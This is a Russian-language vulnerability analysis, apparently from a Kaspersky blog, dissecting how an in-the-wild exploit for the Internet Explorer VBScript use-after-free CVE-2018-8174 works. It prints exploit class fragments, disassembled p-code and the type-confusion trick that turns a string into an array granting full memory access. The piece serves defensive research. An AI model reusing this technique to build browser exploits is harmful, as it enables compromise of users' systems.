Погружение в VBScript

03 Июл 2018

мин. на чтение

Авторы

Борис Ларин

Анализ эксплуатации CVE-2018-8174

В конце апреля 2018 года мы описали новую уязвимость нулевого дня CVE-2018-8174 для Internet Explorer, найденную благодаря нашей «песочнице». Уязвимость использует известную из эксплойта Proof of Concept для CVE-2014-6332 технику, суть которой в «повреждении» двух объектов памяти и изменении типа одного объекта на Array для возможности чтения и записи адресного пространства, а другого объекта — на Integer для получения адреса произвольного объекта.

В то время как эксплойт для CVE-2014-6332 был нацелен на эксплуатацию целочисленного переполнения, которое позволяло производить запись в произвольные участки памяти, меня заинтересовало, как эта техника была адаптирована для использования уязвимости Use-After-Free. Для ответа на этот вопрос рассмотрим внутреннее устройство VBScript-интерпретатора.

Недокументированная платформа

Отладка исполняемого скрипта VBScript — сложная задача. Перед исполнением он компилируется в p-code, который интерпретируется виртуальной машиной. В открытых источниках отсутствует какая-либо информация о внутреннем устройстве этой виртуальной машины и ее инструкциях. Тем не менее, мне удалось найти две веб-страницы с сообщениями инженеров Microsoft, датированные 1999 и 2004 годами и дающие некоторое представление о p-code. Этой информации оказалось достаточно для того, чтобы полностью разобрать все инструкции VM и написать дизассемблер! Созданные в ходе исследования скрипты для дизассемблирования VBScript p-code в памяти отладчиков IDA Pro и WinDBG доступны в нашем репозитории GitHub.

Способность понять интерпретируемый код дает нам возможность очень точно следить за исполнением скрипта: мы владеем полной информацией о том, где код исполняется в данный момент, и можем наблюдать все объекты, которые он создает и использует. Все это значительно помогает в анализе.

Лучшее место для запуска дизассемблирующего скрипта — функция CScriptRuntime::RunNoEH, ответственная непосредственно за интерпретирование p-code.

Важные поля класса CScriptRuntime

Класс CScriptRuntime содержит всю информацию о состоянии интерпретатора: локальные переменные, аргументы функции, указатель на вершину стека и текущую инструкцию, а также адрес скомпилированного скрипта.

Виртуальная машина VBScript стек-ориентирована и состоит из чуть более 100 инструкций.

Все переменные (локальные аргументы и на стеке) представлены в виде структуры VARIANT, занимающей 16 байт, верхнее слово которой обозначает тип данных. Часть значений типов представлена на соответствующей странице в MSDN.

Эксплуатация CVE-2018-8174

Ниже представлен код и дизассемблированный p-code класса Class1:

Class Class1
Dim mem
Function P
End Function
Function SetProp(Value)
	mem=Value
	SetProp=0
End Function
End Class

1

2

3

4

5

6

7

8

9

Class Class1

Dim mem

Function P

End Function

Function SetProp(Value)

mem=Value

SetProp=0

End Function

End Class

    Function 34 ('Class1') [max stack = 1]:
        arg count = 0
        lcl count = 0
    Pcode:
        0000    OP_CreateClass       
        0005    OP_FnBindEx      'p' 35 FALSE
        000F    OP_FnBindEx      'SetProp' 36 FALSE
        0019    OP_CreateVar     'mem' FALSE
        001F    OP_LocalSet      0
        0022    OP_FnReturn     
    Function 35 ('p') [max stack = 0]:
        arg count = 0
        lcl count = 0
    Pcode:
        ***BOS(8252,8264)*** End Function *****
        0000    OP_Bos1          0
        0002    OP_FnReturn     
        0003    OP_Bos0         
        0004    OP_FuncEnd    
    Function 36 ('SetProp') [max stack = 1]:
        arg count = 1
            arg  -1 = ref Variant    'value'
        lcl count = 0
    Pcode:
        ***BOS(8292,8301)*** mem=Value *****
        0000    OP_Bos1          0
        0002    OP_LocalAdr      -1
        0005    OP_NamedSt       'mem'
        ***BOS(8304,8315)*** SetProp=(0) *****
        000A    OP_Bos1          1
        000C    OP_IntConst      0
        000E    OP_LocalSt       0
        ***BOS(8317,8329)*** End Function *****
        0011    OP_Bos1          2
        0013    OP_FnReturn     
        0014    OP_Bos0         
        0015    OP_FuncEnd

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

Function 34 ('Class1') [max stack = 1]:

arg count = 0

lcl count = 0

Pcode:

0000 OP_CreateClass

0005 OP_FnBindEx 'p' 35 FALSE

000F OP_FnBindEx 'SetProp' 36 FALSE

0019 OP_CreateVar 'mem' FALSE

001F OP_LocalSet 0

0022 OP_FnReturn

Function 35 ('p') [max stack = 0]:

arg count = 0

lcl count = 0

Pcode:

***BOS(8252,8264)*** End Function *****

0000 OP_Bos1 0

0002 OP_FnReturn

0003 OP_Bos0

0004 OP_FuncEnd

Function 36 ('SetProp') [max stack = 1]:

arg count = 1

arg -1 = ref Variant 'value'

lcl count = 0

Pcode:

***BOS(8292,8301)*** mem=Value *****

0000 OP_Bos1 0

0002 OP_LocalAdr -1

0005 OP_NamedSt 'mem'

***BOS(8304,8315)*** SetProp=(0) *****

000A OP_Bos1 1

000C OP_IntConst 0

000E OP_LocalSt 0

***BOS(8317,8329)*** End Function *****

0011 OP_Bos1 2

0013 OP_FnReturn

0014 OP_Bos0

0015 OP_FuncEnd

Функция 34 — это конструктор класса Class1.

Инструкция OP_CreateClass вызовет функцию VBScriptClass::Create для создания объекта VBScriptClass.

Инструкции OP_FnBindEx и OP_CreateVar попытаются получить переменные, переданные в аргументах. Так как они еще не существуют, функция VBScriptClass::CreateVar создаст их.

Эта диаграмма показывает, как переменные могут быть получены из объекта VBScriptClass. Значение переменной хранится в структуре VVAL:

Для понимания эксплуатации важно знать, как переменные представлены в структуре VBScriptClass.

Когда инструкция OP_NamedSt ‘mem’ выполняется в функции 36 (SetProp), она вызовет Default Property Getter экземпляра класса, который перед этим был сохранен на стеке, и затем сохранит возвращенное значение в переменную mem.

***BOS(8292,8301)*** mem=Value *****
0000OP_Bos1 0
0002OP_LocalAdr -1 <——— сохраняет аргумент на стеке
0005OP_NamedSt ‘mem’ <——— если это диспетчер класса с Default Property Getter вызвать и сохранить возвращенное значение в 'mem'

Ниже код и дизассемблированный p-code функции 30 (p), которая будет вызвана во время исполнения инструкции OP_NamedSt:

Class lllIIl
Public Default Property Get P
Dim llII
P=CDbl("174088534690791e-324")
For IIIl=0 To 6
	IIIlI(IIIl)=0
Next
Set llII=New Class2
llII.mem=lIlIIl
For IIIl=0 To 6
	Set IIIlI(IIIl)=llII
Next
End Property
End Class

1

2

3

4

5

6

7

8

9

10

11

12

13

14

Class lllIIl

Public Default Property Get P

Dim llII

P=CDbl("174088534690791e-324")

For IIIl=0 To 6

IIIlI(IIIl)=0

llII.mem=lIlIIl

For IIIl=0 To 6

Set IIIlI(IIIl)=llII

End Class

    Function 30 ('p') [max stack = 3]:
        arg count = 0
        lcl count = 1
            lcl   1 =     Variant    'llII'
        tmp count = 4
    Pcode:
        ***BOS(8626,8656)*** P=CDbl("174088534690791e-324") *****
        0000    OP_Bos1          0
        0002    OP_StrConst      '174088534690791e-324'
        0007    OP_CallNmdAdr    'CDbl' 1
        000E    OP_LocalSt       0
        ***BOS(8763,8782)*** For IIIl=(0) To (6) *****
        0011    OP_Bos1          1
        0013    OP_IntConst      0
        0015    OP_IntConst      6
        0017    OP_IntConst      1
        0019    OP_ForInitNamed  'IIIl' 5 4
        0022    OP_JccFalse      0047
        ***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****
        0027    OP_Bos1          2
        0029    OP_IntConst      0
        002B    OP_NamedAdr      'IIIl'
        0030    OP_CallNmdSt     'IIIlI' 1
        ***BOS(8826,8830)*** Next *****
        0037    OP_Bos1          3
        0039    OP_ForNextNamed  'IIIl' 5 4
        0042    OP_JccTrue       0027
        ***BOS(8855,8874)*** Set llII=New Class2 *****
        0047    OP_Bos1          4
        0049    OP_InitClass     'Class2'
        004E    OP_LocalSet      1
        ***BOS(8876,8891)*** llII.mem=lIlIIl *****
        0051    OP_Bos1          5
        0053    OP_NamedAdr      'lIlIIl'
        0058    OP_LocalAdr      1
        005B    OP_MemSt         'mem'
        ….

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

Function 30 ('p') [max stack = 3]:

arg count = 0

lcl count = 1

lcl 1 = Variant 'llII'

tmp count = 4

Pcode:

***BOS(8626,8656)*** P=CDbl("174088534690791e-324") *****

0000 OP_Bos1 0

0002 OP_StrConst '174088534690791e-324'

0007 OP_CallNmdAdr 'CDbl' 1

000E OP_LocalSt 0

***BOS(8763,8782)*** For IIIl=(0) To (6) *****

0011 OP_Bos1 1

0013 OP_IntConst 0

0015 OP_IntConst 6

0017 OP_IntConst 1

0019 OP_ForInitNamed 'IIIl' 5 4

0022 OP_JccFalse 0047

***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****

0027 OP_Bos1 2

0029 OP_IntConst 0

002B OP_NamedAdr 'IIIl'

0030 OP_CallNmdSt 'IIIlI' 1

***BOS(8826,8830)*** Next *****

0037 OP_Bos1 3

0039 OP_ForNextNamed 'IIIl' 5 4

0042 OP_JccTrue 0027

***BOS(8855,8874)*** Set llII=New Class2 *****

0047 OP_Bos1 4

0049 OP_InitClass 'Class2'

004E OP_LocalSet 1

***BOS(8876,8891)*** llII.mem=lIlIIl *****

0051 OP_Bos1 5

0053 OP_NamedAdr 'lIlIIl'

0058 OP_LocalAdr 1

005B OP_MemSt 'mem'

….

Первый базовый блок этой функции:

***BOS(8626,8656)*** P=CDbl(«174088534690791e-324») *****
0000OP_Bos1 0
0002OP_StrConst ‘174088534690791e-324’
0007OP_CallNmdAdr’CDbl’ 1
000EOP_LocalSt 0

Этот блок конвертирует строку 174088534690791e-324 в VARIANT и сохраняет в локальную переменную 0, зарезервированную для возвращаемого значения функции.

VARIANT, полученный после конвертирования 174088534690791e-324 в double

После установки возвращаемого значения, но перед непосредственно возвратом эта функция выполняет:

For IIIl=0 To 6
IIIlI(IIIl)=0
Next

Это вызывает сборщик мусора для экземпляра Class1 и приводит к использованию висячего указателя из-за Use-After-Free уязвимости в Class_Terminate(), о которой мы писали ранее.

В строке

***BOS(8855,8874)*** Set llII=New Class2 *****
0047OP_Bos1 4
0049OP_InitClass ‘Class2’
004EOP_LocalSet 1

инструкция OP_InitClass ‘Class2’ создает экземпляр «злого близнеца» класса Class1 на месте предварительно освобожденного VBScriptClass, который все еще используется инструкцией OP_NamedSt ‘mem’ в функции 36 (SetProp).

Класс Class2 — «злой близнец» класса Class1:

Class Class2
Dim mem
Function P0123456789
	P0123456789=LenB(mem(IlII+(8)))
End Function
Function SPP
End Function
End Class

1

2

3

4

5

6

7

8

Class Class2

Dim mem

Function P0123456789

P0123456789=LenB(mem(IlII+(8)))

End Function

Function SPP

End Function

End Class

    Function 31 ('Class2') [max stack = 1]:
        arg count = 0
        lcl count = 0
    Pcode:
        0000    OP_CreateClass   'Class2'
        0005    OP_FnBindEx      'P0123456789' 32 FALSE
        000F    OP_FnBindEx      'SPP' 33 FALSE
        0019    OP_CreateVar     'mem' FALSE
        001F    OP_LocalSet      0
        0022    OP_FnReturn     
    Function 32 ('P0123456789') [max stack = 2]:
        arg count = 0
        lcl count = 0
    Pcode:
        ***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****
        0000    OP_Bos1          0
        0002    OP_NamedAdr      'IlII'
        0007    OP_IntConst      8
        0009    OP_Add          
        000A    OP_CallNmdAdr    'mem' 1
        0011    OP_CallNmdAdr    'LenB' 1
        0018    OP_LocalSt       0
        ***BOS(8423,8435)*** End Function *****
        001B    OP_Bos1          1
        001D    OP_FnReturn     
        001E    OP_Bos0         
        001F    OP_FuncEnd      
    Function 33 ('SPP') [max stack = 0]:
        arg count = 0
        lcl count = 0
    Pcode:
        ***BOS(8451,8463)*** End Function *****
        0000    OP_Bos1          0
        0002    OP_FnReturn     
        0003    OP_Bos0         
        0004    OP_FuncEnd

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

Function 31 ('Class2') [max stack = 1]:

arg count = 0

lcl count = 0

Pcode:

0000 OP_CreateClass 'Class2'

0005 OP_FnBindEx 'P0123456789' 32 FALSE

000F OP_FnBindEx 'SPP' 33 FALSE

0019 OP_CreateVar 'mem' FALSE

001F OP_LocalSet 0

0022 OP_FnReturn

Function 32 ('P0123456789') [max stack = 2]:

arg count = 0

lcl count = 0

Pcode:

***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****

0000 OP_Bos1 0

0002 OP_NamedAdr 'IlII'

0007 OP_IntConst 8

0009 OP_Add

000A OP_CallNmdAdr 'mem' 1

0011 OP_CallNmdAdr 'LenB' 1

0018 OP_LocalSt 0

***BOS(8423,8435)*** End Function *****

001B OP_Bos1 1

001D OP_FnReturn

001E OP_Bos0

001F OP_FuncEnd

Function 33 ('SPP') [max stack = 0]:

arg count = 0

lcl count = 0

Pcode:

***BOS(8451,8463)*** End Function *****

0000 OP_Bos1 0

0002 OP_FnReturn

0003 OP_Bos0

0004 OP_FuncEnd

Расположение переменных в памяти предсказуемо. Размер данных, занимаемых структурой VVAL, рассчитывается по формуле 0x32 + длина имени переменной в UTF-16.

Ниже представлена диаграмма, которая показывает расположение переменных Class1 относительно переменных Class2, когда Class2 выделен на месте освобожденного Class1.

В конце исполнения инструкции OP_NamedSt ‘mem’ в функции 36 (SetProp) значение, возвращенное функцией 30 (p), будет записано по висячему указателю VVAL ‘mem’ в Class1, переписав тип VARIANT у VVAL ‘mem’ в Class2.

VARIANT с типом Double переписывает тип VARIANT с String на Array

Таким образом, объект с типом String превращается в объект с типом Array, и данные, которые раньше считались строкой, третируются как контрольная структура Array, позволяющая получить доступ ко всему адресному пространству процесса.

Заключение

Наши скрипты для дизассемблирования VBScript, скомпилированного p-code, дают возможность осуществлять отладку VBScript на уровне байт-кода, что значительно помогает в анализе эксплойтов и понимании принципов работы VBScript. Они доступны в нашем публичном репозитории Github.

Случай с CVE-2018-8174 демонстрирует, что когда выделения памяти очень предсказуемы, эксплуатация Use-After-Free уязвимостей не составляет труда. Эксплойт, найденный в «дикой природе», нацелен на более старые версии Windows. Для Windows 7 и Windows 8.1 необходимое для его эксплуатации расположение объектов в памяти наиболее вероятно.

Продукты «Лаборатории Касперского» блокируют компонентом Automatic Exploit Protection (AEP) все стадии эксплойта со следующими вердиктами:

HEUR:Exploit.MSOffice.Generic
HEUR:Exploit.Script.CVE-2018-8174.a
HEUR:Exploit.Script.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic

Авторы

Борис Ларин

Погружение в VBScript

Последние публикации

Отчеты

“Лаборатория Касперского” выявила новую кампанию EastWind, нацеленную на российские организации и использующую CloudSourcerer и инструменты APT31 и APT27.

«Лаборатория Касперского» обнаружила новую APT-угрозу CloudSorcerer, нацеленную на российские государственные организации и использующую облачные службы в качестве командных серверов аналогично APT CloudWizard.

Продолжаем рассказывать об APT-группе ToddyCat. В этой статье поговорим о туннелировании трафика, сохранении доступа к скомпрометированной инфраструктуре и краже данных.

Разбираем фреймворк StripedFly для целевых атак, использовавший собственную версию эксплойта EternalBlue и успешно прикрывавшийся майнером.

Погружение в VBScript

Анализ эксплуатации CVE-2018-8174

Недокументированная платформа

Эксплуатация CVE-2018-8174

Заключение

Криптовалютная игра от APT Lazarus: инвесторы против уязвимостей нулевого дня

Драйвер Windows CLFS и пять эксплойтов операторов шифровальщиков (№ 5: CVE-2023-28252)

Драйвер Windows CLFS и пять эксплойтов операторов шифровальщиков (№ 4: CVE-2023-23376)

Драйвер Windows CLFS и пять эксплойтов операторов шифровальщиков (№ 3, октябрь 2022 г.)

Драйвер Windows CLFS и пять эксплойтов операторов шифровальщиков (№ 2, сентябрь 2022 г.)

Космические угрозы на Земле: ГНСС-приемники с доступом через интернет

Непослушные нейросети и ленивые мошенники

Рассылка Horns&Hooves доставляет NetSupport RAT и BurnsRAT

Отчет о веб-трекинге. Кто больше всего следил за действиями пользователей в интернете в 2023–2024 годах

Indirect prompt injection в реальном мире: как люди ищут, ломают и дразнят нейросети

Последние публикации

Развитие информационных угроз в третьем квартале 2024 года. Мобильная статистика

Развитие информационных угроз в третьем квартале 2024 года. Статистика по ПК

Не поминайте лихом: новая целевая кампания Angry Likho

Финансовые киберугрозы и crimeware в 2025 году

Отчеты

Кампания EastWind: новые атаки CloudSorcerer на госорганизации в России

CloudSorcerer: новая APT-угроза, нацеленная на российские государственные организации

ToddyCat роет норы в вашей инфраструктуре и крадет секреты

StripedFly: двуликий и незаметный

Подпишитесь на еженедельную рассылку